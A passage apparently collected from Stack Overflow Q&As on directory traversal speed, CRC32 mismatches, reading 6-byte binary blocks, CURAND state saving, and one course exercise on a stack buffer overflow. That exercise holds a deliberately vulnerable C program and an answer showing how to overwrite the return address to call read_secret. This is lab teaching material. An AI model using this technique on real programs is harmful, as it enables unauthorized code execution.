Reasonably faster way to traverse a directory tree in Python?

Assuming that the given directory tree is of reasonable size (say, an open source project like Twisted or Python), what is the fastest way to traverse and iterate over the absolute paths of all files/directories inside that directory?
I want to do this from within Python. os.path.walk is slow. So I tried ls -lR and tree -fi. For a project with about 8337 files (including tmp, pyc, test, .svn files):
$ time tree -fi > /dev/null
real 0m0.170s
user 0m0.044s
sys 0m0.123s
$ time ls -lR > /dev/null
real 0m0.292s
user 0m0.138s
sys 0m0.152s
$ time find . > /dev/null
real 0m0.074s
user 0m0.017s
sys 0m0.056s
$
tree appears to be faster than ls -lR (ls -R is faster than tree, but it does not give full paths). find is the fastest.
Can anyone think of a faster and/or better approach? On Windows, I may simply ship a 32-bit binary tree.exe or ls.exe if necessary.
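For reference, shelling out to find from Python would look something like this (a sketch; it assumes a POSIX find on PATH, which is where a shipped binary would slot in on Windows):
import subprocess

def list_paths(root):
    # Run the external `find` and split its output into one path per line.
    out = subprocess.check_output(['find', root])
    return out.decode('utf-8', 'replace').splitlines()

paths = list_paths('/path/to/project')  # substitute a real root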
Update 1: Added find
Update 2: Why do I want to do this? ... I am trying to make a smart replacement for cd, pushd, etc., and wrapper commands for other commands that rely on passing paths (less, more, cat, vim, tail). The program will occasionally use file traversal to do that (e.g., typing "cd sr grai pat lxml" would automatically translate to "cd src/pypm/grail/patches/lxml"). I won't be satisfied if this cd replacement takes, say, half a second to run. See http://github.com/srid/pf
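For context, the matching pf does is roughly of this shape (a sketch of the idea, not pf's actual code): each typed fragment becomes an unbounded gap in a pattern tested against every path in the tree.
import os, re

def match_paths(fragments, root):
    # "sr grai pat lxml" -> sr.*grai.*pat.*lxml: one unbounded closure per gap,
    # tried against every directory path under root.
    pattern = re.compile('.*'.join(re.escape(f) for f in fragments))
    return [dirpath
            for dirpath, dirnames, filenames in os.walk(root)
            if pattern.search(dirpath)]

print(match_paths(['sr', 'grai', 'pat', 'lxml'], '.'))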

Your approach in pf is going to be hopelessly slow, even if os.path.walk took no time at all. Doing a regex match containing three unbounded closures across all extant paths will kill you right there. Here is the code from Kernighan and Pike that I referenced; it is a proper algorithm for the task:
/* spname: return correctly spelled filename */
/*
 * spname(oldname, newname) char *oldname, *newname;
 * returns -1 if no reasonable match to oldname,
 *          0 if exact match,
 *          1 if corrected.
 * stores corrected name in newname.
 */
#include <sys/types.h>
#include <sys/dir.h>

spname(oldname, newname)
char *oldname, *newname;
{
    char *p, guess[DIRSIZ+1], best[DIRSIZ+1];
    char *new = newname, *old = oldname;

    for (;;) {
        while (*old == '/')             /* skip slashes */
            *new++ = *old++;
        *new = '\0';
        if (*old == '\0')               /* exact or corrected */
            return strcmp(oldname, newname) != 0;
        p = guess;                      /* copy next component into guess */
        for ( ; *old != '/' && *old != '\0'; old++)
            if (p < guess+DIRSIZ)
                *p++ = *old;
        *p = '\0';
        if (mindist(newname, guess, best) >= 3)
            return -1;                  /* hopeless */
        for (p = best; *new = *p++; )   /* add to end */
            new++;                      /* of newname */
    }
}

mindist(dir, guess, best)               /* search dir for guess */
char *dir, *guess, *best;
{
    /* set best, return distance 0..3 */
    int d, nd, fd;
    struct {
        ino_t ino;
        char  name[DIRSIZ+1];           /* 1 more than in dir.h */
    } nbuf;

    nbuf.name[DIRSIZ] = '\0';           /* +1 for terminal '\0' */
    if (dir[0] == '\0')                 /* current directory */
        dir = ".";
    d = 3;                              /* minimum distance */
    if ((fd = open(dir, 0)) == -1)
        return d;
    while (read(fd, (char *) &nbuf, sizeof(struct direct)) > 0)
        if (nbuf.ino) {
            nd = spdist(nbuf.name, guess);
            if (nd <= d && nd != 3) {
                strcpy(best, nbuf.name);
                d = nd;
                if (d == 0)             /* exact match */
                    break;
            }
        }
    close(fd);
    return d;
}

/* spdist: return distance between two names */
/*
 * very rough spelling metric:
 * 0 if the strings are identical
 * 1 if two chars are transposed
 * 2 if one char wrong, added or deleted
 * 3 otherwise
 */
#define EQ(s,t) (strcmp(s,t) == 0)

spdist(s, t)
char *s, *t;
{
    while (*s++ == *t)
        if (*t++ == '\0')
            return 0;                   /* exact match */
    if (*--s) {
        if (*t) {
            if (s[1] && t[1] && *s == t[1]
                && *t == s[1] && EQ(s+2, t+2))
                return 1;               /* transposition */
            if (EQ(s+1, t+1))
                return 2;               /* 1 char mismatch */
        }
        if (EQ(s+1, t))
            return 2;                   /* extra character */
    }
    if (*t && EQ(s, t+1))
        return 2;                       /* missing character */
    return 3;
}
Note: this code was written long before ANSI C, ISO C, or POSIX anything was even imagined, back when one read directory files raw. The approach of the code is far more useful than all the pointer slinging.
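For comparison, here is a rough Python transliteration of spdist (a sketch mirroring the C above; same return values: 0 identical, 1 transposition, 2 one char wrong/added/deleted, 3 otherwise):
def spdist(s, t):
    # very rough spelling metric, transliterated from the C above
    i = 0
    while i < len(s) and i < len(t) and s[i] == t[i]:
        i += 1                                    # skip the common prefix
    if i == len(s) and i == len(t):
        return 0                                  # exact match
    s, t = s[i:], t[i:]
    if s and t:
        if (len(s) > 1 and len(t) > 1 and
                s[0] == t[1] and t[0] == s[1] and s[2:] == t[2:]):
            return 1                              # transposition
        if s[1:] == t[1:]:
            return 2                              # 1 char mismatch
    if s and s[1:] == t:
        return 2                                  # extra character
    if t and s == t[1:]:
        return 2                                  # missing character
    return 3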

It would be hard to get much better than find in performance, but the question is how much faster you need it to be, and why. You claim that os.path.walk is slow; indeed, it is ~3 times slower on my machine over a tree of 16k directories. But then again, we're talking about the difference between 0.68 seconds and 1.9 seconds for Python.
If setting a speed record is your goal, you can't beat hard-coded C that is 75% system-call bound, and you can't make the OS go faster. That said, 25% of the Python time is spent in system calls. What is it that you want to do with the traversed paths?
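For scale, here is a minimal sketch of timing the Python 2 side on your own tree (os.path.walk is the old callback API); compare against time find . > /dev/null in a shell:
import os.path, time

def visit(counter, dirname, names):
    counter[0] += len(names)      # count the entries seen in each directory

counter = [0]
t0 = time.time()
os.path.walk('.', visit, counter)
print('%d entries in %.2fs' % (counter[0], time.time() - t0))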

One solution you have not mentioned is os.walk. I'm not sure it'd be any faster than os.path.walk, but it's objectively better: it gives you a generator instead of the callback interface.
You have not said what you're going to do with the list of directories when you have it, so it's hard to give more specific suggestions.
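For the record, a minimal sketch of os.walk yielding absolute paths, which is what the question asks for:
import os

def walk_abs(root):
    root = os.path.abspath(root)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            yield os.path.join(dirpath, name)

for path in walk_abs('.'):
    print(path)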

Although I doubt you have multiple read heads, here's how you can traverse a few million files (we've done 10M+ in a few minutes).
https://github.com/hpc/purger/blob/master/src/treewalk/treewalk.c

Related

Incorrect CRC calculation in protocol: one CRC is computed with zlib, the other in a hand-written function

I am implementing a protocol on an STM32F412 board. It's almost done; I just need to add a CRC check for the received data.
I tried using the internal CRC module to calculate the CRC, but I could not match the result to any online CRC calculator, so I decided to do a simple implementation of the Ethernet CRC.
static const uint32_t crc32_tab[] =
{
0x00000000L, 0x77073096L, 0xee0e612cL, 0x990951baL, 0x076dc419L,
0x706af48fL, 0xe963a535L, 0x9e6495a3L, 0x0edb8832L, 0x79dcb8a4L,
0xe0d5e91eL, 0x97d2d988L, 0x09b64c2bL, 0x7eb17cbdL, 0xe7b82d07L,
0x90bf1d91L, 0x1db71064L, 0x6ab020f2L, 0xf3b97148L, 0x84be41deL,
0x1adad47dL, 0x6ddde4ebL, 0xf4d4b551L, 0x83d385c7L, 0x136c9856L,
0x646ba8c0L, 0xfd62f97aL, 0x8a65c9ecL, 0x14015c4fL, 0x63066cd9L,
0xfa0f3d63L, 0x8d080df5L, 0x3b6e20c8L, 0x4c69105eL, 0xd56041e4L,
0xa2677172L, 0x3c03e4d1L, 0x4b04d447L, 0xd20d85fdL, 0xa50ab56bL,
0x35b5a8faL, 0x42b2986cL, 0xdbbbc9d6L, 0xacbcf940L, 0x32d86ce3L,
0x45df5c75L, 0xdcd60dcfL, 0xabd13d59L, 0x26d930acL, 0x51de003aL,
0xc8d75180L, 0xbfd06116L, 0x21b4f4b5L, 0x56b3c423L, 0xcfba9599L,
0xb8bda50fL, 0x2802b89eL, 0x5f058808L, 0xc60cd9b2L, 0xb10be924L,
0x2f6f7c87L, 0x58684c11L, 0xc1611dabL, 0xb6662d3dL, 0x76dc4190L,
0x01db7106L, 0x98d220bcL, 0xefd5102aL, 0x71b18589L, 0x06b6b51fL,
0x9fbfe4a5L, 0xe8b8d433L, 0x7807c9a2L, 0x0f00f934L, 0x9609a88eL,
0xe10e9818L, 0x7f6a0dbbL, 0x086d3d2dL, 0x91646c97L, 0xe6635c01L,
0x6b6b51f4L, 0x1c6c6162L, 0x856530d8L, 0xf262004eL, 0x6c0695edL,
0x1b01a57bL, 0x8208f4c1L, 0xf50fc457L, 0x65b0d9c6L, 0x12b7e950L,
0x8bbeb8eaL, 0xfcb9887cL, 0x62dd1ddfL, 0x15da2d49L, 0x8cd37cf3L,
0xfbd44c65L, 0x4db26158L, 0x3ab551ceL, 0xa3bc0074L, 0xd4bb30e2L,
0x4adfa541L, 0x3dd895d7L, 0xa4d1c46dL, 0xd3d6f4fbL, 0x4369e96aL,
0x346ed9fcL, 0xad678846L, 0xda60b8d0L, 0x44042d73L, 0x33031de5L,
0xaa0a4c5fL, 0xdd0d7cc9L, 0x5005713cL, 0x270241aaL, 0xbe0b1010L,
0xc90c2086L, 0x5768b525L, 0x206f85b3L, 0xb966d409L, 0xce61e49fL,
0x5edef90eL, 0x29d9c998L, 0xb0d09822L, 0xc7d7a8b4L, 0x59b33d17L,
0x2eb40d81L, 0xb7bd5c3bL, 0xc0ba6cadL, 0xedb88320L, 0x9abfb3b6L,
0x03b6e20cL, 0x74b1d29aL, 0xead54739L, 0x9dd277afL, 0x04db2615L,
0x73dc1683L, 0xe3630b12L, 0x94643b84L, 0x0d6d6a3eL, 0x7a6a5aa8L,
0xe40ecf0bL, 0x9309ff9dL, 0x0a00ae27L, 0x7d079eb1L, 0xf00f9344L,
0x8708a3d2L, 0x1e01f268L, 0x6906c2feL, 0xf762575dL, 0x806567cbL,
0x196c3671L, 0x6e6b06e7L, 0xfed41b76L, 0x89d32be0L, 0x10da7a5aL,
0x67dd4accL, 0xf9b9df6fL, 0x8ebeeff9L, 0x17b7be43L, 0x60b08ed5L,
0xd6d6a3e8L, 0xa1d1937eL, 0x38d8c2c4L, 0x4fdff252L, 0xd1bb67f1L,
0xa6bc5767L, 0x3fb506ddL, 0x48b2364bL, 0xd80d2bdaL, 0xaf0a1b4cL,
0x36034af6L, 0x41047a60L, 0xdf60efc3L, 0xa867df55L, 0x316e8eefL,
0x4669be79L, 0xcb61b38cL, 0xbc66831aL, 0x256fd2a0L, 0x5268e236L,
0xcc0c7795L, 0xbb0b4703L, 0x220216b9L, 0x5505262fL, 0xc5ba3bbeL,
0xb2bd0b28L, 0x2bb45a92L, 0x5cb36a04L, 0xc2d7ffa7L, 0xb5d0cf31L,
0x2cd99e8bL, 0x5bdeae1dL, 0x9b64c2b0L, 0xec63f226L, 0x756aa39cL,
0x026d930aL, 0x9c0906a9L, 0xeb0e363fL, 0x72076785L, 0x05005713L,
0x95bf4a82L, 0xe2b87a14L, 0x7bb12baeL, 0x0cb61b38L, 0x92d28e9bL,
0xe5d5be0dL, 0x7cdcefb7L, 0x0bdbdf21L, 0x86d3d2d4L, 0xf1d4e242L,
0x68ddb3f8L, 0x1fda836eL, 0x81be16cdL, 0xf6b9265bL, 0x6fb077e1L,
0x18b74777L, 0x88085ae6L, 0xff0f6a70L, 0x66063bcaL, 0x11010b5cL,
0x8f659effL, 0xf862ae69L, 0x616bffd3L, 0x166ccf45L, 0xa00ae278L,
0xd70dd2eeL, 0x4e048354L, 0x3903b3c2L, 0xa7672661L, 0xd06016f7L,
0x4969474dL, 0x3e6e77dbL, 0xaed16a4aL, 0xd9d65adcL, 0x40df0b66L,
0x37d83bf0L, 0xa9bcae53L, 0xdebb9ec5L, 0x47b2cf7fL, 0x30b5ffe9L,
0xbdbdf21cL, 0xcabac28aL, 0x53b39330L, 0x24b4a3a6L, 0xbad03605L,
0xcdd70693L, 0x54de5729L, 0x23d967bfL, 0xb3667a2eL, 0xc4614ab8L,
0x5d681b02L, 0x2a6f2b94L, 0xb40bbe37L, 0xc30c8ea1L, 0x5a05df1bL,
0x2d02ef8dL
};
uint32_t calc_crc_calculate(uint8_t *pData, uint32_t uLen)
{
    uint32_t val = 0xFFFFFFFFU;
    uint32_t i;   /* unsigned, to match uLen */
    for (i = 0; i < uLen; i++) {
        val = crc32_tab[(val ^ pData[i]) & 0xFF] ^ ((val >> 8) & 0x00FFFFFF);
    }
    return val ^ 0xFFFFFFFF;
}
I calculated the CRC of 0x6F and compared the result to the online calculators, and it apparently matches.
When I try to test the protocol with my Python code, I'm just unable to match the CRCs. In Python I'm using the following code:
d = 0x6f
crc = zlib.crc32(bytes(d))&0xFFFFFFFF
I'm now unable to tell which is right. Apparently my algorithm is OK, because it matches the online calculator. But those online calculators do not always seem reliable, and I doubt that Python's zlib implementation is wrong; at worst, I may be using it incorrectly.
Actually, you can compute the Ethernet CRC32 with the built-in CRC module of the STM32. It took me quite a while to make it match up as well.
This code should match up for sizes divisible by 4 (I also used Python zlib on the other end):
#include "stm32l4xx_hal.h"
uint32_t CRC32_Compute(const uint32_t *data, size_t sizeIn32BitWords)
{
CRC_HandleTypeDef hcrc = {
.Instance = CRC,
.Init.DefaultPolynomialUse = DEFAULT_POLYNOMIAL_ENABLE,
.Init.DefaultInitValueUse = DEFAULT_INIT_VALUE_ENABLE,
.Init.InputDataInversionMode = CRC_INPUTDATA_INVERSION_WORD,
.Init.OutputDataInversionMode = CRC_OUTPUTDATA_INVERSION_ENABLE,
.InputDataFormat = CRC_INPUTDATA_FORMAT_WORDS,
};
HAL_StatusTypeDef status = HAL_CRC_Init(&hcrc);
assert (status == HAL_OK)
uint32_t checksum = HAL_CRC_Calculate(&hcrc, data, sizeIn32BitWords);
uint32_t checksumInverted = ~checksum;
return checksumInverted;
}
The challenge with sizes not divisible by 4 is to get the "inversion/reversal" (changing of the bit order) right. There is an example of how the hardware handles this in the "RM0394 Reference manual STM32L43xxx STM32L44xxx STM32L45xxx STM32L46xxx advanced ARM®-based 32-bit MCUs Rev 3" on page 333.
The essence is that the reversal reverses the bit order, and for CRC32 this reversal must happen at the word level, i.e. over 32 bits.
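For reference, the Python side of that comparison is plain zlib CRC-32 over the word-aligned byte stream (a sketch; the sample payload here is made up):
import struct, zlib

# Hypothetical received frame: four 32-bit little-endian words, so len % 4 == 0.
payload = struct.pack('<4I', 0x11111111, 0x22222222, 0x33333333, 0x44444444)
crc = zlib.crc32(payload) & 0xFFFFFFFF
print(hex(crc))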
OK, it certainly was a bug on my part, and it was happening in my Python code.
I suddenly realized that I was effectively doing bytes(0x6F), which just creates a bytes object of 111 zero bytes (0x6F == 111), not the single byte 0x6F.
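A quick interpreter check (Python 3) makes the bug obvious:
>>> len(bytes(0x6F))   # bytes(n) makes n zero bytes, and 0x6F == 111
111
>>> bytes(0x6F)[:4]
b'\x00\x00\x00\x00'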
What I actually needed to do was
import struct
import zlib

d = struct.pack('B', 0x6F)  # pack 0x6F as one unsigned byte
crc = zlib.crc32(d) & 0xFFFFFFFF
This question could have been avoided had I just done a little bit of rubber duck debugging. Hopefully this will help someone else.

How to quickly divide a binary file into 6-byte blocks in C++ or Python? [closed]

I’m reading a file in C++ and Python as a binary file. I need to divide the binary into blocks, each 6 bytes. For example, if my file is 600 bytes, the result should be 100 blocks, each 6 bytes.
I have tried struct (in C++ and Python) and array (Python). Neither of them divides the binary into blocks of 6 bytes; they only divide it into blocks whose size is a power of two (1, 2, 4, 8, 16, etc.).
The array approach was very fast, reading 1 GB of binary data in less than a second as blocks of 4 bytes. In contrast, the other methods I tried were all extremely slow, taking tens of minutes for a few megabytes.
How can I read the binary as blocks of 6 bytes as fast as possible? Any help in either C++ or Python will be great. Thank you.
EDIT - The Code:
struct Block
{
    char data[6];
};

class BinaryData
{
private:
    char data[6];
public:
    BinaryData() {};
    ~BinaryData() {};
    void readBinaryFile(string strFile)
    {
        Block block;
        ifstream binaryFile;
        int size = 0;
        binaryFile.open(strFile, ios::in | ios::binary);   // ios::in, not ios::out, for an ifstream
        binaryFile.seekg(0, ios::end);
        size = (int)binaryFile.tellg();
        binaryFile.seekg(0, ios::beg);
        cout << size << endl;
        while ((int)binaryFile.tellg() < size)
        {
            cout << binaryFile.tellg() << " , " << size << " , "
                 << size - (int)binaryFile.tellg() << endl;
            binaryFile.read((char*)block.data, sizeof(block.data));
            cout << block.data << endl;
            //cin >> block.data;
            if (size - (int)binaryFile.tellg() > size)
            {
                break;
            }
        }
        binaryFile.close();
    }
};
Notes:
- in the file, the numbers are big-endian
- the goal is to read them as fast as possible, then sort them in ascending order
Let's start simple, then optimize.
Simple Loop
uint8_t array1[6];
while (my_file.read((char *) &array1[0], 6))
{
    Process_Block(&array1[0]);
}
The above code reads a file 6 bytes at a time and sends each block to a function.
It meets the requirements, but is not very optimal.
Reading Larger Blocks
Files are streaming devices. They have an overhead to start streaming, but are very efficient to keep streaming. In other words, we want to read as much data per transaction as possible to reduce the overhead.
static const unsigned int CAPACITY = 6 * 1024;
uint8_t block1[CAPACITY];
while (my_file.read((char *) &block1[0], CAPACITY))
{
    const size_t bytes_read = my_file.gcount();
    size_t blocks_read = bytes_read / 6;   /* not const: counted down below */
    uint8_t const * block_pointer = &block1[0];
    while (blocks_read > 0)
    {
        Process_Block(block_pointer);
        block_pointer += 6;
        --blocks_read;
    }
}
/* note: a final chunk shorter than CAPACITY sets failbit; check gcount()
   after the loop if the file size is not a multiple of CAPACITY */
The above code reads up to 1024 blocks in one transaction. After reading, each block is sent to a function for processing.
This version is more efficient than the Simple Loop, as it reads more data per transaction. Adjust the CAPACITY to find the optimal size on your platform.
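Since the question allows Python as well, the same chunked-read idea looks like this there (a sketch; struct.iter_unpack carves each 6-byte block into a big-endian 16-bit + 32-bit pair, recombined into one integer):
import struct

CAPACITY = 6 * 1024                    # read up to 1024 blocks per transaction

def read_blocks(path):
    with open(path, 'rb') as f:
        while True:
            chunk = f.read(CAPACITY)
            if not chunk:
                break
            usable = len(chunk) - len(chunk) % 6   # drop a trailing partial block
            for hi, lo in struct.iter_unpack('>HI', chunk[:usable]):
                yield (hi << 32) | lo

# usage: for value in read_blocks('data.bin'): ...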
Loop Unrolling
The previous code reduces the first bottleneck of input transfer speed (although there is still room for optimization). Another technique is to reduce the overhead of the processing loop by performing more data processing inside the loop. This is called loop unrolling.
const size_t bytes_read = my_file.gcount();
size_t blocks_read = bytes_read / 6;   /* not const: counted down below */
uint8_t const * block_pointer = &block1[0];
while ((blocks_read / 4) != 0)
{
    Process_Block(block_pointer);
    block_pointer += 6;
    Process_Block(block_pointer);
    block_pointer += 6;
    Process_Block(block_pointer);
    block_pointer += 6;
    Process_Block(block_pointer);
    block_pointer += 6;
    blocks_read -= 4;
}
while (blocks_read > 0)
{
    Process_Block(block_pointer);
    block_pointer += 6;
    --blocks_read;
}
You can adjust the quantity of operations in the loop, to see how it affects your program's speed.
Multi-Threading & Multiple Buffers
Two more techniques for speeding up the reading of the data are to use multiple threads and multiple buffers.
One thread, an input thread, reads the file into a buffer. After reading into the first buffer, the thread sets a semaphore indicating there is data to process. The input thread reads into the next buffer. This repeats until the data is all read. (For a challenge, figure out how to reuse the buffers and notify the other thread of which buffers are available).
The second thread is the processing thread. This processing thread is started first and waits for the first buffer to be completely read. After the buffer has the data, the processing thread starts processing the data. After the first buffer has been processed, the processing thread starts on the next buffer. This repeats until all the buffers have been processed.
The goal here is to use as many buffers as necessary to keep the processing thread running and not waiting.
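A minimal Python sketch of that scheme (queue.Queue stands in for the semaphores, two queues recycle the buffers between the threads, and process_chunk is a stand-in for real work):
import queue, threading

BUF_SIZE = 6 * 1024
NUM_BUFFERS = 4

def process_chunk(data):
    pass                                 # stand-in for the real processing

def reader(path, filled, empty):
    with open(path, 'rb') as f:
        while True:
            buf = empty.get()            # take a free buffer
            n = f.readinto(buf)
            filled.put((buf, n))         # hand it to the processing thread
            if n == 0:                   # EOF: the (buf, 0) pair is the sentinel
                break

def processor(filled, empty):
    while True:
        buf, n = filled.get()
        if n == 0:
            break
        process_chunk(buf[:n])
        empty.put(buf)                   # recycle the buffer

filled, empty = queue.Queue(), queue.Queue()
for _ in range(NUM_BUFFERS):
    empty.put(bytearray(BUF_SIZE))

t = threading.Thread(target=processor, args=(filled, empty))
t.start()
reader('data.bin', filled, empty)        # hypothetical input file
t.join()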
Edit 1: Other techniques
Memory Mapped Files
Some operating systems support memory mapped files. The OS reads a portion of the file into memory. When a location outside the memory is accessed, the OS loads another portion into memory. Whether this technique improves performance needs to be measured (profiled).
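In Python, for instance, mmap exposes the file as a sliceable buffer, so the 6-byte blocks can be decoded in place (a sketch):
import mmap

def blocks(path):
    with open(path, 'rb') as f:
        with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as m:
            for off in range(0, len(m) - len(m) % 6, 6):
                yield int.from_bytes(m[off:off + 6], 'big')

# usage, per the stated goal: values = sorted(blocks('data.bin'))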
Parallel Processing & Threading
Adding multiple threads may show negligible performance gain. Computers have a data bus (data highway) connecting many hardware devices, including memory, file I/O and the processor. Devices will be paused to let other devices use the data highway. With multiple cores or processors, one processor may have to wait while the other processor is using the data highway. This waiting may cause negligible performance gain when using multiple threads or parallel processing. Also, the operating system has overhead when constructing and maintaining threads.
Try this. The input file is given as an argument to the program. As you said, I assume the 6-byte values in the file are written in big-endian order, but I make no assumptions about the machine reading and sorting the file; the program runs on both little- and big-endian hosts (the case is checked at execution).
#include <iostream>
#include <fstream>
#include <vector>
#include <cstdint>
#include <algorithm>
#include <limits.h> // CHAR_BIT
using namespace std;
#if CHAR_BIT != 8
# error that code supposes a char has 8 bits
#endif
int main(int argc, char ** argv)
{
if (argc != 2)
cerr << "Usage: " << argv[1] << " <file>" << endl;
else {
ifstream in(argv[1], ios::binary);
if (!in.is_open())
cerr << "Cannot open " << argv[1] << endl;
else {
in.seekg(0, ios::end);
size_t n = (size_t) in.tellg() / 6;
vector<uint64_t> values(n);
uint64_t * p = values.data(); // for performance
uint64_t * psup = p + n;
in.seekg(0, ios::beg);
int i = 1;
if (*((char *) &i)) {
// little endian
unsigned char s[6];
uint64_t v = 0;
while (p != psup) {
if (!in.read((char *) s, 6))
return -1;
((char *) &v)[0] = s[5];
((char *) &v)[1] = s[4];
((char *) &v)[2] = s[3];
((char *) &v)[3] = s[2];
((char *) &v)[4] = s[1];
((char *) &v)[5] = s[0];
*p++ = v;
}
}
else {
// big endian
uint64_t v = 0;
while (p != psup) {
if (!in.read(((char *) &v) + 2, 6))
return -1;
*p++ = v;
}
}
cout << "file successfully read" << endl;
sort(values.begin(), values.end());
cout << "values sort" << endl;
// DEBUG, DO ON A SMALL FILE ;-)
for (auto v : values)
cout << v << endl;
}
}
}

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program, which has a buffer overflow vulnerability, to get it to print the secret behind a protected .txt file (via read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I pass a large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, so that vuln returns to the read_secret function instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, and that I would have to overwrite the saved return address (which points back into main) with read_secret's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability, you first have to identify the offset at which you can get a segfault. In your case I assume it's 1026. The whole game is to overwrite the saved return address (the value loaded into EIP, which tells the program what to execute next) and point it at your own target.
To do that you need the address of the target function, so open your program in gdb and type:
x read_secret
Then copy the address. You then have to pack it in the target's byte order (little-endian here). I do it with the struct module in Python.
import struct
struct.pack("<I", address)  # "<I" is little-endian; use ">I" for big-endian
Then you have to append it to the input you pass to the binary, something like:
/task2/vuln "$(python -c "print 'a' * 1026 + 'the_address'")"
# on a bash shell, not in a script; note the program takes the payload as an argument, not on stdin
If all of this doesn't work, just add a few more characters to your offset. There might be something you didn't see coming.
/task2/vuln "$(python -c "print 'a' * 1034 + 'the_address'")"
Hope that answers your question.
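Putting it together in one place, a payload-builder sketch (the 1026 offset is from the question; the address is hypothetical, so substitute whatever gdb reports for read_secret):
import struct
import subprocess

offset = 1026                               # from the question; adjust if needed
addr = struct.pack('<I', 0x080484b6)        # hypothetical read_secret address from gdb
payload = b'a' * offset + addr
subprocess.run(['/task2/vuln', payload])    # the payload goes in argv[1], as vuln expects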

How to save and restore the state of a random number generator with CUDA CURAND?

I am using a large CUDA-matrix library developed within our organization. I need to save the state of a CUDA RNG to take a snapshot of a long-running simulation, and be able to restore it later. This is simple with, e.g., python+numpy:
state = numpy.random.get_state()
# state is a tuple with 5 fields which can be pickled, etc.
...
numpy.random.set_state(state)
I cannot seem to find equivalent functionality in the CUDA host API. You can set the seed and offset, but there is no way to retrieve them to save. The device API seems to offer something like this, but this library uses the host API, and it would be monstrous to change.
The hacky solution I am thinking about is to keep track of the number of calls to the RNG (reset when a seed is set), and simply call an RNG function repeatedly on restore. However, I am not sure whether the function parameters must be identical, e.g. matrix shapes, etc., to get it to the same state. Similarly, if the number of calls were equivalent to the offset parameter for initializing the RNG, this would work as well, i.e., if I call the RNG 200 times, I could set the offset to 200. However, in python, the offset in the state can increase by more than 1 with each call, so this is also potentially wrong.
Any insights into how to tackle this are appreciated!
For the CURAND Host API, I believe curandSetGeneratorOffset() can probably work for this.
Here's a modified example from the curand host API documentation:
$ cat t721.cu
/*
* This program uses the host CURAND API to generate 10
* pseudorandom floats. And then regenerate those same floats.
*/
#include <stdio.h>
#include <stdlib.h>
#include <cuda.h>
#include <curand.h>
#define CUDA_CALL(x) do { if((x)!=cudaSuccess) { \
printf("Error at %s:%d\n",__FILE__,__LINE__);\
return EXIT_FAILURE;}} while(0)
#define CURAND_CALL(x) do { if((x)!=CURAND_STATUS_SUCCESS) { \
printf("Error at %s:%d\n",__FILE__,__LINE__);\
return EXIT_FAILURE;}} while(0)
int main(int argc, char *argv[])
{
    size_t n = 10;
    size_t i;
    curandGenerator_t gen;
    float *devData, *hostData;

    /* Allocate n floats on host */
    hostData = (float *)calloc(n, sizeof(float));
    /* Allocate n floats on device */
    CUDA_CALL(cudaMalloc((void **)&devData, n*sizeof(float)));

    /* Create pseudo-random number generator */
    CURAND_CALL(curandCreateGenerator(&gen, CURAND_RNG_PSEUDO_DEFAULT));
    /* Set seed */
    CURAND_CALL(curandSetPseudoRandomGeneratorSeed(gen, 1234ULL));
    // generator offset = 0

    /* Generate n floats on device */
    CURAND_CALL(curandGenerateUniform(gen, devData, n));
    // generator offset = n
    /* Generate n floats on device */
    CURAND_CALL(curandGenerateUniform(gen, devData, n));
    // generator offset = 2n

    /* Copy device memory to host */
    CUDA_CALL(cudaMemcpy(hostData, devData, n * sizeof(float),
        cudaMemcpyDeviceToHost));
    /* Show result */
    for(i = 0; i < n; i++) {
        printf("%1.4f ", hostData[i]);
    }
    printf("\n\n");

    CURAND_CALL(curandSetGeneratorOffset(gen, n));
    // generator offset = n
    CURAND_CALL(curandGenerateUniform(gen, devData, n));
    // generator offset = 2n

    /* Copy device memory to host */
    CUDA_CALL(cudaMemcpy(hostData, devData, n * sizeof(float),
        cudaMemcpyDeviceToHost));
    /* Show result */
    for(i = 0; i < n; i++) {
        printf("%1.4f ", hostData[i]);
    }
    printf("\n");

    /* Cleanup */
    CURAND_CALL(curandDestroyGenerator(gen));
    CUDA_CALL(cudaFree(devData));
    free(hostData);
    return EXIT_SUCCESS;
}
$ nvcc -o t721 t721.cu -lcurand
$ ./t721
0.7816 0.2338 0.6791 0.2824 0.6299 0.1212 0.4333 0.3831 0.5136 0.2987
0.7816 0.2338 0.6791 0.2824 0.6299 0.1212 0.4333 0.3831 0.5136 0.2987
$
So you'll need to keep track of the quantity of random numbers generated (not the number of RNG function calls) up to the point when you do your checkpoint, and save that.
When you restart, initialize the generator in the same way:
/* Create pseudo-random number generator */
CURAND_CALL(curandCreateGenerator(&gen,
CURAND_RNG_PSEUDO_DEFAULT));
/* Set seed */
CURAND_CALL(curandSetPseudoRandomGeneratorSeed(gen,
1234ULL));
but then advance by the number of previously generated values (n):
CURAND_CALL(curandSetGeneratorOffset(gen, n));
So, it is possible to store and restore the state by tracking the number of 32-bit values generated using curandSetGeneratorOffset. The algorithm looks something like:
template<typename T> RNG(T* X, size_T N /*number of values*/){
...
if (sizeof(T) == 1)
offset += (N+4-1)/4;
else if (sizeof(T) == 2)
offset += (N+2-1)/4;
else if (sizeof(T) == 4 || USING_GENERATE_UNIFORM_DOUBLE)
offset += N;
else if (sizeof(T) == 8)
offset += 2*N;
}
